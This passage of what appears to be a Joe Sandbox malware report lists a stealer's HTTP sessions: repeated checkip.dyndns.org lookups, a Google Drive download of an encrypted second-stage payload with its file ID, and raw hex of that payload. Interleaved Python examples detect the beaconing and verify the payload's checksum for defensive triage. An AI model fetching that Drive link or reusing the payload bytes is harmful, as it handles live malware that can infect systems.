                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 50047 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:56.990768909 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Jan 10, 2025 23:12:57.696752071 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
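The sessions above show two distinct network behaviours worth turning into detection logic: a tight loop of external-IP lookups to checkip.dyndns.org, every request carrying the same hard-coded "MSIE 6.0; Windows NT 5.2" User-Agent and spaced roughly 1.5 to 1.7 seconds apart, and, earlier in the trace, a Google Drive direct-download chain (drive.google.com/uc?export=download redirecting to drive.usercontent.google.com/download?id=) fetched with a Firefox User-Agent. The script below is an added example, not part of the Joe Sandbox report or of either malware family; it models each request as a small record, normalises the two timestamp styles the report mixes (CET with nanoseconds, and plain UTC), and flags both patterns over a sample constructed from the report's own hosts, request lines, user agents and timestamps. The extra IP-echo hostnames, the regex shapes and the polling thresholds are this example's assumptions.

```python
"""Added example (not from the Joe Sandbox report): triage HTTP sessions of the
kind listed above. The sample records are constructed from the report's own
sessions (hosts, request lines, user agents and timestamps copied from it)."""
import re
import statistics
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Hosts that echo the caller's public IP. checkip.dyndns.org is the one in the
# report; the other two are added by this example as commonly abused alternatives.
IP_ECHO_HOSTS = {"checkip.dyndns.org", "checkip.amazonaws.com", "api.ipify.org"}
# Exact User-Agent the stealer used for every checkip request in the report.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# Google Drive direct-download URL shapes seen in the report.
DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
DRIVE_DOWNLOAD = re.compile(r"^GET /(?:uc\?export=download&id=|download\?id=)[\w-]+")


@dataclass
class HttpRequest:
    ts: datetime          # normalised to UTC
    host: str
    request_line: str     # e.g. "GET / HTTP/1.1"
    user_agent: str


def parse_ts(text: str) -> datetime:
    """Parse both timestamp styles the report mixes: 'Jan 10, 2025 23:12:48.893722057 CET'
    and '2025-01-10 22:11:47 UTC'. Nanoseconds are truncated to microseconds and
    CET is shifted to UTC (CET = UTC+1, which matches the Date headers in the report)."""
    m = re.fullmatch(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET", text)
    if m:
        base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
        micro = int(m.group(2)[:6].ljust(6, "0"))
        return (base.replace(microsecond=micro) - timedelta(hours=1)).replace(tzinfo=timezone.utc)
    m = re.fullmatch(r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC", text)
    if m:
        return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    raise ValueError(f"unrecognised timestamp: {text!r}")


def is_ip_check_beacon(req: HttpRequest) -> bool:
    """An external-IP lookup sent with the hard-coded IE6 User-Agent from the report."""
    return req.host in IP_ECHO_HOSTS and req.user_agent == LEGACY_UA


def is_drive_payload_fetch(req: HttpRequest) -> bool:
    """A direct-download request for a Google Drive file id (stage-2 hosting)."""
    return req.host in DRIVE_HOSTS and DRIVE_DOWNLOAD.match(req.request_line) is not None


def beacon_intervals(reqs) -> list:
    """Seconds between consecutive IP-check requests, in time order."""
    ts = sorted(r.ts for r in reqs if is_ip_check_beacon(r))
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def triage(reqs, min_beacons: int = 3, max_gap: float = 5.0) -> list:
    """Return human-readable findings; the thresholds are this example's choice."""
    findings = []
    drive = [r for r in reqs if is_drive_payload_fetch(r)]
    if drive:
        findings.append(f"stage-2 fetch from Google Drive: {drive[0].host} {drive[0].request_line}")
    gaps = beacon_intervals(reqs)
    if gaps and len(gaps) + 1 >= min_beacons and max(gaps) <= max_gap:
        findings.append(f"external IP polled {len(gaps) + 1}x, median gap {statistics.median(gaps):.2f}s")
    return findings


FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
# Constructed sample: the Drive redirect chain and six checkip polls from the report.
SAMPLE = [
    HttpRequest(parse_ts("2025-01-10 22:11:47 UTC"), "drive.google.com",
                "GET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1", FIREFOX_UA),
    HttpRequest(parse_ts("2025-01-10 22:11:48 UTC"), "drive.usercontent.google.com",
                "GET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1", FIREFOX_UA),
] + [
    HttpRequest(parse_ts(t), "checkip.dyndns.org", "GET / HTTP/1.1", LEGACY_UA)
    for t in ("Jan 10, 2025 23:12:48.893722057 CET", "Jan 10, 2025 23:12:50.417284012 CET",
              "Jan 10, 2025 23:12:52.098161936 CET", "Jan 10, 2025 23:12:53.735686064 CET",
              "Jan 10, 2025 23:12:55.293111086 CET", "Jan 10, 2025 23:12:56.990768909 CET")
]

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

Matching the User-Agent exactly rather than on "MSIE 6.0" alone keeps the rule tight: the string is a fixed client artefact, while the polling cadence is what separates a stealer's "what is my IP" loop from a single legitimate lookup.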


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49972 | 216.58.206.46 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:11:47 UTC | 216 | OUT | GET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
2025-01-10 22:11:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 10 Jan 2025 22:11:47 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-bW4cjSzBl_2Dw4CZ1jvetQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
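The redirect target in the next session returns the encrypted second stage as an opaque .bin with two integrity hints in its headers: Content-Length: 94272 and X-Goog-Hash: crc32c=pYC8Dw==. An analyst who later pulls the same file id can use those values to confirm the copy on disk is byte-for-byte what the sandbox fetched (Drive links are routinely re-uploaded with different content). The code below is an added example, not part of the Joe Sandbox report; it implements CRC-32C (Castagnoli) in the table-driven reflected form, decodes Google's base64 big-endian encoding of the checksum, and compares. The standard check value for "123456789" is used as a known-answer test because the payload itself is not on this page; the command-line usage at the bottom assumes a local copy named after the Content-Disposition filename.

```python
"""Added example (not from the Joe Sandbox report): verify a retrieved copy of the
stage-2 blob against the X-Goog-Hash header Google Drive sends with it."""
import base64
from typing import Optional

_CRC32C_POLY = 0x82F63B78  # Castagnoli polynomial, reflected form


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ _CRC32C_POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _make_table()


def crc32c(data: bytes, crc: int = 0) -> int:
    """Table-driven CRC-32C. Pass the previous result as `crc` to checksum in chunks."""
    crc ^= 0xFFFFFFFF
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def goog_hash_crc32c(header_value: str) -> int:
    """Extract the crc32c from an X-Goog-Hash value such as 'crc32c=pYC8Dw==' or
    'crc32c=pYC8Dw==, md5=...'. Google base64-encodes the 4-byte big-endian CRC."""
    for item in header_value.split(","):
        name, _, b64 = item.strip().partition("=")
        if name == "crc32c":
            raw = base64.b64decode(b64)
            if len(raw) != 4:
                raise ValueError("crc32c must decode to 4 bytes")
            return int.from_bytes(raw, "big")
    raise ValueError("no crc32c entry in X-Goog-Hash")


def encode_goog_hash(data: bytes) -> str:
    """Produce the header value Google would send for `data` (for round-trip checks)."""
    return "crc32c=" + base64.b64encode(crc32c(data).to_bytes(4, "big")).decode()


def matches_goog_hash(data: bytes, header_value: str, expected_len: Optional[int] = None) -> bool:
    """True when `data` has the expected length (if given) and the CRC-32C from the header."""
    if expected_len is not None and len(data) != expected_len:
        return False
    return crc32c(data) == goog_hash_crc32c(header_value)


if __name__ == "__main__":
    import sys
    # Values copied from the response headers of session 1 in the report.
    REPORT_HASH = "crc32c=pYC8Dw=="
    REPORT_LEN = 94272
    # Assumed local copy of the download, named after the Content-Disposition filename.
    path = sys.argv[1] if len(sys.argv) > 1 else "sMscBVXhTocIfuwGoZBYD188.bin"
    with open(path, "rb") as fh:
        blob = fh.read()
    print("match" if matches_goog_hash(blob, REPORT_HASH, REPORT_LEN) else "MISMATCH")
```

A CRC is an integrity hint, not an authenticity proof: it only tells you the bytes you hold are the bytes Google served at that moment, so record the SHA-256 of the verified copy alongside it before sharing.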


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49974 | 142.250.181.225 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:11:48 UTC | 258 | OUT | GET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
2025-01-10 22:11:51 UTC | 4944 | IN | HTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgS7Lai0fr4L14Qax-dP0nWxek8Qf3M68IRhtebFwxmskJO3z34P0P_nWlUrXNDLREjf
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="sMscBVXhTocIfuwGoZBYD188.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Tue, 10 Dec 2024 07:32:04 GMT
                                                                                                          Date: Fri, 10 Jan 2025 22:11:50 GMT
                                                                                                          Expires: Fri, 10 Jan 2025 22:11:50 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=pYC8Dw==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
2025-01-10 22:11:51 UTC | 4944 | IN | Data Raw: 55 d3 96 21 a5 e2 1b 76 17 03 6f 65 13 45 3b 84 96 c4 37 b2 3d bc c4 3b b4 1c 8c 3f 64 b3 2e 2f 2a 9d ef 45 95 40 60 3d 3f 7a db d5 ff d0 46 2b 54 2d ed 7c ef a3 dd 81 10 1f bd 28 44 43 89 1b 25 be a8 cb 62 07 ec d1 6d 25 a6 31 05 12 53 e3 0d 94 ab da af a0 be 45 e3 0a da c0 77 3f 68 f0 ff 80 ac 84 69 8d b4 b9 0d 14 2a 4a 64 61 58 77 74 c0 b6 a7 0d 8c 81 5f 01 3d e9 b6 49 c5 6f ca 26 46 08 d4 08 50 a2 54 b0 af 6e 0b c8 30 69 dc 36 a7 92 51 43 51 c3 84 7f e0 49 25 9a 6a 89 16 07 ae c9 8b 32 6e 60 f9 ec 83 8a 2e 55 70 c8 d1 36 c4 c8 fc 81 aa 3c 0c b0 b0 71 34 c9 1c fc c9 94 41 7a 5d 5d 3c 4f 05 b7 88 1b 84 f4 28 ad 86 e3 89 03 65 e8 2e 2d bc 20 17 0a d2 bf c3 67 d1 25 a3 c9 e4 51 dc 65 b1 c9 3c 8a 30 3f c8 33 62 ac 11 fa 44 a9 dc bc 61 ca 37 0f 57 9c 93 ad
                                                                                                          Data Ascii: U!voeE;7=;?d./*E@`=?zF+T-|(DC%bm%1SEw?hi*JdaXwt_=Io&FPTn0i6QCQI%j2n`.Up6<q4Az]]<O(e.- g%Qe<0?3bDa7W
2025-01-10 22:11:51 UTC | 4810 | IN | Data Raw: 17 8b b2 1d b9 a1 f8 16 99 e0 c7 bf 98 99 d5 21 10 11 52 1e ed 35 b0 b2 a2 df 97 17 7c 19 63 fe 95 fb d7 67 e5 a4 80 0b 63 7f d0 8f c4 68 f2 80 f2 61 93 38 24 2b 08 49 dd b3 6d 90 79 69 a9 27 02 c1 9e a7 f9 58 33 b5 a6 a5 8d e5 d3 44 dd 11 25 2a c2 f2 92 86 5d 2e 22 3b 64 2e 4c da 8b d3 4e 61 6e 39 b4 aa 3e 5d 3d 4c b9 1f 3c 49 cd 08 e7 0d 1e e1 42 af 6b 5f ad 18 42 d9 e2 2a c3 99 af 96 4d 94 22 dc 8b 74 be 29 72 99 5c 51 2a a9 a6 31 60 2a 65 03 72 84 7e 1d 2f c0 9a 0c 0d 46 53 9b 5d 01 89 0d 6b c4 9e 3c e9 54 9d d9 b4 17 b0 76 95 48 c5 b2 b0 79 aa cb 00 10 92 fb fa a0 ca 37 b6 2b 92 9f 2b af d4 60 59 91 ba 06 76 7a 5c 06 4d 08 4a da 4c e7 94 74 03 23 ee 3d 96 53 b6 78 75 5f ba 0b a9 43 bd 0d 92 7d 11 94 fc 0d 66 3e 1f 00 13 ab ce 33 17 1d 36 e2 21 f6 71
                                                                                                          Data Ascii: !R5|cgcha8$+Imyi'X3D%*].";d.LNan9>]=L<IBk_B*M"t)r\Q*1`*er~/FS]k<TvHy7++`Yvz\MJLt#=Sxu_C}f>36!q
2025-01-10 22:11:51 UTC | 1322 | IN | Data Raw: f4 32 aa 1e 22 8c 4e d6 1a 77 d6 3f a1 3d ed 9c f1 4d 39 fc 0f 6e 7f 15 6e 74 11 ba 2f 71 b1 f7 c3 a6 2c cd 30 26 7e ee a9 d0 60 32 ed a0 f0 ba 51 51 8d 9e 0d 8b 91 31 c6 f9 37 7b c5 f1 12 b4 da 49 a6 00 58 60 42 53 58 83 1f 18 ea eb 98 47 f6 bf bf a2 55 bb 58 72 67 30 5d f5 c4 22 c7 17 e8 45 12 b2 37 a8 d5 8f f0 f6 e3 df 3e 49 29 f4 d5 8e f0 b8 8d 3e a9 78 4e 3a 6c 40 f1 6c fd 9f 40 8d c0 94 e9 e9 11 b9 46 b6 71 04 7a b8 59 d6 e9 78 81 80 d8 94 5c 44 25 55 d0 2f 32 3e 51 07 08 24 57 d0 9a c8 d0 d2 b6 4b 7d 6a 15 3b b7 9e 4d 2d 20 6f e8 d3 e6 40 08 a3 59 1e bf 0d 37 28 dc 39 e3 eb b1 60 e7 4a 22 99 36 24 61 50 05 3d 61 23 19 62 a2 cc e6 a2 7f cd 4d 86 25 8a 4e be bb af 3b 6a c7 d3 5a 5c 09 87 27 20 f0 1c 06 67 29 22 b7 bf ad 32 aa c8 56 b1 1b 0f ae 17 70
                                                                                                          Data Ascii: 2"Nw?=M9nnt/q,0&~`2QQ17{IX`BSXGUXrg0]"E7>I)>xN:l@l@FqzYx\D%U/2>Q$WK}j;M- o@Y7(9`J"6$aP=a#bM%N;jZ\' g)"2Vp
2025-01-10 22:11:51 UTC | 1390 | IN | Data Raw: 75 84 1f f9 22 e7 18 f8 3e 4c 72 d5 1b 97 42 6f 64 3f 02 e6 cd 8d d9 89 84 23 c3 89 7f 08 3b 3c fc 0a b8 51 07 74 1e 92 e5 82 5a fb 30 75 5e 2a 76 08 63 79 0f 2b 18 07 d5 b3 8c 82 b5 28 b7 17 f4 7e ea b2 d4 4a 79 63 c9 87 77 5e 51 89 98 0f e2 de 19 1b fd 1f a0 d6 f4 09 cc bb d8 78 0b 4a 62 96 45 54 83 0c 33 87 ea 02 47 fc bf 47 a2 7e a8 58 70 36 77 4d f5 c0 5e 94 0a e8 35 ad e6 38 a8 df 85 f6 fe d7 c4 3a 2f 27 f6 ae e4 f0 b8 98 16 09 a1 4e 30 66 4b eb e3 b9 d5 40 8c e1 fc c8 23 04 b3 1e 40 54 13 02 55 4b c5 9c cb a1 b4 a7 94 31 0e 55 f7 f1 1e 93 20 47 0d 78 86 5b c6 f2 84 ca 5f 23 35 2e 6b 30 27 e1 14 4d 2d 20 11 da d6 e0 21 61 50 54 1c ce e7 12 3f a6 cf 30 eb bb 18 0a 5c 22 eb 22 b7 61 50 0b e1 17 3b 67 b6 8a 98 ec d0 91 d7 44 e5 4d 44 49 92 bc 0f 65 3f
                                                                                                          Data Ascii: u">LrBod?#;<QtZ0u^*vcy+(~Jycw^QxJbET3GG~Xp6wM^58:/'N0fK@#@TUK1U Gx[_#5.k0'M- !aPT?0\""aP;gDMDIe?
2025-01-10 22:11:51 UTC | 1390 | IN | Data Raw: ea b4 16 30 73 f6 1c 66 6c 10 61 37 b2 b8 2f 75 a2 80 99 ab b6 da 16 e5 70 9d 4d d0 62 3d 70 c6 9c f9 40 5f fb cc 15 f0 ac 5e 2d fd 1f a0 d2 27 77 26 96 49 ac 17 48 71 66 21 0c 99 0c 58 c0 a5 02 47 fc ac 8a b3 44 b3 2b 80 1c 76 57 e6 d2 4d 86 78 19 4f 3a ec 80 bb cc 94 e5 f2 3d d9 ec e8 7d f6 ae c9 e3 ac 9f 05 6f 0a ac 35 6c 30 e2 78 97 c7 51 99 d2 fb a9 86 e3 b3 6e e8 57 15 64 a5 cf e5 3c 69 84 ac 2b 97 34 19 34 42 c7 1e f0 27 7d 0b 1e 37 4f d2 ca 85 d0 c5 a1 2d 2e 7b 06 26 45 d9 57 3b 39 78 d8 f6 e2 51 0e 9e 40 0d df d4 28 08 e9 06 21 ff a0 71 76 55 5d b4 43 79 75 41 1a d2 2d 1e e7 69 9c 66 e7 89 74 d6 57 89 33 87 5a 8f a7 b0 79 df c6 d3 5e 65 cc 94 39 3b e4 0d 1d dc 01 e6 ac 8f ad 21 9f d8 48 a3 21 27 6b 06 70 aa ca 05 36 15 cb 9d 80 2f a3 d2 2f 02 b8
                                                                                                          Data Ascii: 0sfla7/upMb=p@_^-'w&IHqf!XGD+vWMxO:=}o5l0xQnWd<i+44B'}7O-.{&EW;9xQ@(!qvU]CyuA-iftW3Zy^e9;!H!'kp6//
2025-01-10 22:11:51 UTC | 1390 | IN | Data Raw: 27 38 fc 14 ad e9 f5 0f c3 bd 4c a6 12 52 4b 68 55 72 83 0c 33 d8 ed 02 55 f7 bf 9b 93 55 aa 49 70 1e 04 95 ee c0 2c bc 59 e8 4f 30 ed 21 25 86 85 f6 e4 eb c9 12 9d 24 f6 a4 de 0e b9 84 1f 69 7d 5f 35 40 49 e5 7d 82 d5 78 50 c4 ea ba e9 63 51 75 e2 01 1a 03 4a 5e c5 e6 6e ac 56 d5 96 2d 26 de 55 d4 0d f2 38 40 0b 67 d8 57 d2 eb 93 d8 f9 f1 24 26 05 6b 31 9f c0 65 17 2a 63 ea d3 e9 40 07 fb c9 1c c4 44 24 22 c9 1b 5f 16 b1 6a ed 59 29 8a 46 7b 6d 41 0d 6f 2b 32 13 07 74 98 e6 a8 62 af bb 95 22 91 26 92 b7 ad 4a 0e ad d3 5e 7e d6 87 27 2a e1 14 69 cd 29 22 a6 9c aa 23 8d e4 e6 6f 29 1e a6 73 61 a0 e2 4a 1a 18 d0 86 e3 4c 41 d7 2e 1d aa e8 17 f6 25 8f 19 b2 5c e5 c7 d3 6d 2a dd 5b fd ad a6 7d 2a c5 6c 96 da 58 c5 7b 6f cb 3b 18 a8 4f f0 7b 0f b4 7f ab 9c 1c
                                                                                                          Data Ascii: '8LRKhUr3UUIp,YO0!%$i}_5@I}xPcQuJ^nV-&U8@gW$&k1e*c@D$"_jY)F{mAo+2tb"&J^~'*i)"#o)saJLA.%\m*[}*lX{o;O{
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: e8 4f 2a e6 37 a8 9b 85 f6 e4 fc fe 3e 65 58 f7 ae c8 c3 b8 89 07 7a 67 52 18 b4 40 f1 64 f4 f5 5d 8d b4 c2 f4 e9 11 b9 64 e2 77 2c 88 b3 5e cf e7 6e bd ea d4 96 27 08 56 82 d4 07 e7 32 59 7f 52 38 57 a2 8e 52 d0 d2 b4 13 26 05 c6 31 9f cc 5a f7 39 65 f6 d3 e7 69 19 8e 54 1c cc 54 30 5a b0 0d 30 9b de bf e7 4a 24 96 45 79 66 22 7f 5f 32 53 76 bd 8a 98 e0 b1 71 c8 55 92 50 07 55 92 c6 c2 95 26 c7 d5 4d 71 cb 82 0f b9 f0 1c 00 5e 21 33 a4 a3 e4 34 a8 ca 57 b1 34 60 aa 07 70 aa 8d 4e 37 15 cb a6 02 5d 41 d1 3c 7b ba e1 03 02 24 40 1b 2d 3f e8 e3 c5 a4 36 1a dd 88 bb 8e d6 39 c2 6e 9c ce 30 8c 73 e1 a8 31 cb a8 bc f0 7b 03 a7 7a ba 9b 08 a2 aa cb 75 15 a3 9d 55 38 0e 9d 1b 19 32 77 08 b8 df 9d af dc b2 0d bd 72 a7 56 5a 6a fd 1b 13 cd 20 99 31 c5 3b 74 70 dd
                                                                                                          Data Ascii: O*7>eXzgR@d]dw,^n'V2YR8WR&1Z9eiTT0Z0J$Eyf"_2SvqUPU&Mq^!34W4`pN7]A<{$@-?69n0s1{zuU82wrVZj 1;tp
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 37 71 04 76 a0 5b d4 e9 41 17 ac d5 90 34 06 34 5d f8 44 e7 16 52 0c 08 2e 38 d6 e0 80 da bd b7 34 2e 60 3d a5 9f ca 4b 3e 23 72 e9 d4 1e 50 1d 85 45 16 d2 bb 36 3b d3 00 3b c7 a7 42 4d 4a 22 91 5c 6d 0e 0f 01 43 38 32 10 40 1f 98 e6 a4 66 c5 44 95 22 b0 69 92 9e 07 40 26 cd db 4f 73 a8 1b 3b 2a 80 73 d3 4d 29 24 c3 d0 a7 32 8a e1 ea b1 3e 09 bd 03 70 b1 e6 39 d4 10 c1 fe 80 75 c0 d7 2f 78 bd 16 14 ed 20 21 f3 39 35 8e 0b ec 36 3d 0b dc b2 53 a5 23 2a ce 75 81 e7 12 ce fe de a2 20 c3 a5 3f 82 9d 11 b4 0f 18 be 1f 80 28 ee 45 cd 8f 88 5f 40 bd bf 70 94 2a d5 5d cd 78 db ba da ad f0 98 69 bc 7b 44 4f e1 6f 2e e8 20 f8 97 9f 79 71 70 a7 52 73 ee ed a3 4a a7 3b 3c a2 62 04 77 bb 13 4a 0a c7 a5 9e fa 0c 43 88 3c da cd e2 43 d8 0b 9e 36 81 a0 96 fd 3e 4f c4 7b
                                                                                                          Data Ascii: 7qv[A44]DR.84.`=K>#rPE6;;BMJ"\mC82@fD"i@&Os;*sM)$2>p9u/x !956=S#*u ?(E_@p*]xi{DOo. yqpRsJ;<bwJC<C6>O{
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 02 e2 e0 c0 ea 47 f0 8c 45 19 b6 a7 32 28 a8 07 18 6a b1 6a ed 5c dc 98 12 7b 6d 41 0d 6f 7f 3e 94 57 8a 98 e7 87 63 b2 a2 81 22 eb eb b7 a1 a4 e2 03 df a1 72 61 da f7 85 0f e9 0d 02 ef 0c 38 de c9 b2 32 f0 6b 73 aa 2f 0a 0c 23 6c d2 29 69 36 65 63 a6 36 5d 41 dd 3c 7f d5 e7 17 fc 21 42 1c 14 7b fe 1d ce 37 32 0b d6 a0 ad a6 6d 3e d5 b2 9e cc 4e d4 62 e7 9c c0 3c 7f d6 f0 7b db a4 5a 92 a8 08 89 80 d8 53 bf 8b cf 5f 30 15 44 69 85 04 36 64 d7 0a 9d af da dd 41 bd 72 ad 29 e7 6a fd 77 01 c8 20 98 35 b7 d9 35 70 ad 40 65 a0 e6 a3 36 a2 2a 31 b9 2c 04 66 b1 8c 59 22 1f a1 9e f0 6f 77 bc ea b9 e2 bd 44 c9 07 aa d6 79 77 91 fd 3e 9b df 59 32 56 7b 93 a6 39 21 0f 8b 91 a4 e2 69 63 39 68 65 09 e2 20 89 7f 72 ff 23 3c 38 ae 57 76 58 a1 dc 92 f7 b8 f6 42 4c b1 43
                                                                                                          Data Ascii: GE2(jj\{mAo>Wc"ra82ks/#l)i6ec6]A<!B{72m>Nb<{ZS_0Di6dAr)jw 55p@e6*1,fY"owDyw>Y2V{9!ic9he r#<8WvXBLC
